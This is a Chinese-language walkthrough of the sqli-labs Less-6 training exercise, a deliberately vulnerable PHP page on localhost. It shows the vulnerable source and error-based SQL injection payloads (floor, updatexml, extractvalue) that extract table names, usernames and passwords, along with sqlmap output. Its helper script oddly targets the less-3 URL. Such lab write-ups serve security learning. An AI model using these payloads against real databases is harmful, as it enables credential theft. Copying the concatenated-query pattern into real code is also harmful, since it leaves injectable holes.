sqli-lab-less6
一、靶标地址
Less-6 GET-Double Injection-Double Quotes-string
#字符型带双引号双注入
http://127.0.0.1/sqli/less-6/
二、漏洞探测
http://127.0.0.1/sqli/less-6/?id=1
#正常回显
#You are in...........
http://127.0.0.1/sqli/less-6/?id=1'
#正常回显
http://127.0.0.1/sqli/less-6/?id=1"
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
#单引号里面的是报错的语句 "1"" LIMIT 0,1
#通过报错猜测后面的语句为 where id="$id" limit 0,1
http://127.0.0.1/sqli/less-6/?id=1" --+
#正常回显
#You are in...........
#select * from users where id="1" limit 0,1;
思路:正常回显无法爆库,须通过报错回显爆库
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
//漏洞语句部分
$id = '"'.$id.'"'; //用于连接获取的id
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//正常回显无法报出内容
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color= "#FFFF00">';
print_r(mysql_error());
//报错回显才可报出内容
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
四、黑盒与白盒测试
#黑白盒直接测试
$id = '"'.$id.'"'; //用于连接获取的id
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
print_r(mysql_error());
相关函数:
floor()、updatexml()、extractvalue()
原理参照less-5
1、floor()函数报错
#获取数据库 用户 版本号
id=0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取表名
id=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取列名
id=0" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取用户名
id=0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
2、updatexml()函数报错
#获取数据库名
id=1" and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'
#获取表名
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0) --+
#Subquery returns more than 1 row
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) --+
#XPATH syntax error: '~emails'
#获取列名
id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) --+
#获取列字段
id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) --+
id=1" and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) --+
3、extractvalue()函数报错
#获取当期数据库名
id=1" union select 1,2,extractvalue(1,concat(0x7e,(select database()))) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'
#获取表名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
#XPATH syntax error: '~emails,referers,uagents,users'
#获取列名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+
#XPATH syntax error: '~id,username,password'
#获取列字段
id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) --+
id=1" and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) --+
五、脚本撰写
import requests
url="http://127.0.0.1/sqli/less-3/index.php?id=1"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload=""
response=requests.get(url+payload,headers=header)
print(response.text)
六、sqlmap
sqlmap -u http://127.0.0.1/sqli/less-6/index.php?id=1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3522=3522#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1" AND (SELECT 4730 FROM(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(4730=4730,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VNHE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 1180 FROM (SELECT(SLEEP(5)))gUVz)-- xPrk
七、总结
正常回显无法爆库,须通过报错回显爆库